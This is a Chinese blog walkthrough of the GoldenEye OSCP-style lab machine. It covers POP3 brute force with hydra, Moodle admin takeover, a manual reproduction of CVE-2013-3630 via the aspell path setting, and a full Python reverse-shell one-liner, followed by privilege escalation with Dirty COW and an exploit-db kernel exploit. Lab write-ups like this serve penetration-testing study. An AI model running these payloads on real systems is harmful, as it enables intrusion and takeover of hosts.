GoldenEye靶機work_through暨CVE-2013-3630復現

wuerror 發表於 2021-03-28
Go

前言

備考OSCP,所以接下來會做一系列的OSCP向靶機來練手

靶機描述

I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.

I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.

I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.

Beta - 2018-05-02 v1 - 2018-05-04

資訊蒐集

nmap -sP 192.168.218.0/24

發現靶機IP 192.168.218.131

nmap -sV -A 192.168.218.131

Nmap scan report for 192.168.218.131
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:06:CF:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.218.131

訪問80埠
GoldenEye靶機work_through暨CVE-2013-3630復現
得到提示,使用賬號GOLDENEYE,top弱密碼爆破/sev-home/實現登陸。

抓包看了一下

GET /sev-home/sev-home/ HTTP/1.1
Host: 192.168.218.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.218.131/
Upgrade-Insecure-Requests: 1
Authorization: Basic U2V2ZXJuYXlhOkdvbGRlbkV5ZQ==

Authorization: Basic base64(賬號:密碼)

寫個指令碼生成字典,intruder爆破無果。

import base64


url = 'http://192.168.218.131/sev-home/'
dic = 'F:/創新實踐/dictionary/Web-Fuzzing-Box-main/Brute/Password/Top_Dev_Password.txt'
name = 'GOLDENEYE'

with open(dic, 'r') as f1:
    with open('goldeneye.txt', 'a') as f2:
        for line in f1:
            passwd = line.strip()
            plaintext = name + ':'+ passwd
            ciphertext = base64.b64encode(plaintext.encode())
            auth = 'Basic ' + ciphertext.decode()
            f2.write(auth)
            f2.write('\n')

重新回到頁面,檢視原始碼。有一個terminal.js.註釋部分如下

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you [email protected] below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//

html實體編碼的密碼,給它解一下,為InvincibleHack3r
GoldenEye靶機work_through暨CVE-2013-3630復現

嘗試用Boris和密碼登陸,賬號為boris時成功。

登入後又是一段文字

# GoldenEye

GoldenEye is a Top Secret Soviet oribtal weapons project. Since you  have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) 

Please email a qualified GNO supervisor to receive the online **GoldenEye Operators Training** to become an Administrator of the GoldenEye system

Remember, since ***security by obscurity\*** is very effective, we have configured our pop3 service to run on a very high non-default port

在原始碼中發現註釋Natalya和Boris,還是之前那倆
GoldenEye靶機work_through暨CVE-2013-3630復現

從文字看我們下一步要向主管發郵件,pop3埠在高階口處。

再用nmap掃一波全埠

nmap -sV -p- 192.168.218.131

Nmap scan report for 192.168.218.131
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open  ssl/pop3 Dovecot pop3d
55007/tcp open  pop3     Dovecot pop3d
MAC Address: 00:0C:29:06:CF:07 (VMware)

問題來了,smtp和pop3這倆郵件協議要有什麼攻擊姿勢呢?

搜了一下,一是smtp 偽造郵件,二是pop3爆破。偽造郵件的主要問題在於這主管的郵箱地址是啥,[email protected] ?往哪兒發呢。先爆破pop3吧。

有msf的pop3_login模組爆破了一波boris,感覺太慢了。換成hydra吧

(先查了下kali的字典放在哪兒)

hydra -s 55007 -l boris -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3
hydra -s 55007 -l natalya -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3

得到結果:
GoldenEye靶機work_through暨CVE-2013-3630復現

boris secret1!
natalya bird
那麼現在嘗試登陸pop3,常用命令如下

命令 引數 使用在何種狀態中 描述
USER Username 認證 此命令與下面的pass命令若成功,將導致狀態轉換
PASS Password 認證 此命令若成功,狀態轉化為更新
APOP Name,Digest 認證 Digest是MD5訊息摘要
STAT None 處理 請求伺服器發回關於郵箱的統計資料,如郵件總數和總位元組數
UIDL [Msg#](郵件號,下同) 處理 返回郵件的唯一識別符號,POP3會話的每個識別符號都將是唯一的
LIST [Msg#] 處理 返回郵件的唯一識別符號,POP3會話的每個識別符號都將是唯一的
RETR [Msg#] 處理 返回由引數標識的郵件的全部文字
DELE [Msg#] 處理 伺服器將由引數標識的郵件標記為刪除,由QUIT命令執行
TOP [Msg#] 處理 伺服器將返回由引數標識的郵件的郵件頭+前n行內容,n必須是正整數
NOOP None 處理 伺服器返回一個肯定的響應,用於測試連線是否成功
QUIT None 處理、認證 *1)* 如果伺服器處於“處理”狀態,麼將進入“更新”狀態以刪除任何標記為刪除的郵件,並重返“認證”狀態。*2)* 如果伺服器處於“認證”狀態,則結束會話,退出連線

boris下有3篇郵件

LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: [email protected]
X-Original-To: boris
Delivered-To: [email protected]
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: [email protected]
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: [email protected]
X-Original-To: boris
Delivered-To: [email protected]
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: [email protected]
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: [email protected]

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: [email protected]
X-Original-To: boris
Delivered-To: [email protected]
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: [email protected]
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.


換一個使用者Natalya(登陸的時候要大寫,也不知道為啥hydra小寫也行)有兩封郵件

LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets

Return-Path: [email protected]
X-Original-To: natalya
Delivered-To: [email protected]
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: [email protected]
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: [email protected]

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: [email protected]
X-Original-To: natalya
Delivered-To: [email protected]
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: [email protected]
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: [email protected]

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle 😃

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

根據現在獲得的線索,有一個新系統。host繫結靶機IP到severnaya-station.com

訪問http://severnaya-station.com/gnocertdir
GoldenEye靶機work_through暨CVE-2013-3630復現
登陸後,wappalyzer識別為Moodle。點選site blogs標籤發現版本2.2.3.
點選message發現與Dr Doak的訊息,其中提到郵件賬號doak,也爆破一下。等待的時候順便搜一下Moodle都有啥公開漏洞。
GoldenEye靶機work_through暨CVE-2013-3630復現
登陸郵箱檢視
GoldenEye靶機work_through暨CVE-2013-3630復現
成功得到賬號,在加上剛才的搜尋,懷疑是教師角色的RCE那個洞(CVE-2018-1133,但版本又對不上。

先登陸翻一翻再說——在 my private files 中得到s3cret.txt

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

圖片如下,放大可以看到英文大意是藏了acess key
GoldenEye靶機work_through暨CVE-2013-3630復現
分析一下
GoldenEye靶機work_through暨CVE-2013-3630復現
base64這段解出來是xWinter1995x!,嘗試登陸admin賬號成功。

打點-getshell

想辦法getshell.繼續看exploit-db,發現有一個2013年的RCE,還是msf上有的exp。但OSCP不是隻能在一臺靶機上使用msf嘛,大致掃了一遍exp也就3個步驟,為了練習起見我們先手動跟一下exp流程(其實是msf沒打通)。

1.更改spell engine
GoldenEye靶機work_through暨CVE-2013-3630復現
把Spell engine改成上圖,第二個不用改

2.插入payload

    post = {
      'section' => 'systempaths',
      'sesskey' => sesskey,
      'return' => '',
      's__gdversion' => '2',
      's__pathtodu' => '/usr/bin/du',
      's__aspellpath' => payload.encoded,
      's__pathtodot' => ''
    }

    aspell = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/admin/settings.php'),
      'vars_post' => post,
      'cookie' => sess
    })

    spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'

    print_status("Triggering payload")

我們先找到這個頁面/admin/settings.php?section=systempaths
GoldenEye靶機work_through暨CVE-2013-3630復現
這裡填的程式碼也不知道是給點提示還是我之前msf沒打通留下的。

填入python彈shell的程式碼

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.218.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

3.真觸發漏洞

spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status("Triggering payload")

    resp = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php'),
      'data' => spellcheck,
      'ctype' => 'application/json',
      'cookie' => sess
    })

    if !resp or resp.code != 200
      fail_with("Error triggering payload")

訪問http://severnaya-station.com/gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php 通過hackbar傳送exp的觸發內容
GoldenEye靶機work_through暨CVE-2013-3630復現

成功接到反彈shell
GoldenEye靶機work_through暨CVE-2013-3630復現

後滲透-提權

照例先找suid提權

find / -perm -u=s -type f 2>/dev/null 

GoldenEye靶機work_through暨CVE-2013-3630復現

本地python起一個http,靶機用wget下載Linux Exploit Suggester 2,給執行許可權並執行
GoldenEye靶機work_through暨CVE-2013-3630復現

上傳髒牛

因為沒有gcc 用cc 編譯執行

cc cowroot.c -o cowroot -pthread
./cowroot

GoldenEye靶機work_through暨CVE-2013-3630復現

然後執行ls /root卡住了。。訪問網站發現打不開。giao,直接打掛了。

幾經波折最終用https://www.exploit-db.com/exploits/37292拿到root

568628e0d993b1973adc718237da6e93
GoldenEye靶機work_through暨CVE-2013-3630復現
GoldenEye靶機work_through暨CVE-2013-3630復現

總結

這次的主要收穫是對郵件協議pop3的攻擊,getshell過程很普通,但是沒有用msf——exp步驟清晰確實也不需要。拿到shell之後,提權的過程確實比預料的要廢了很多波折。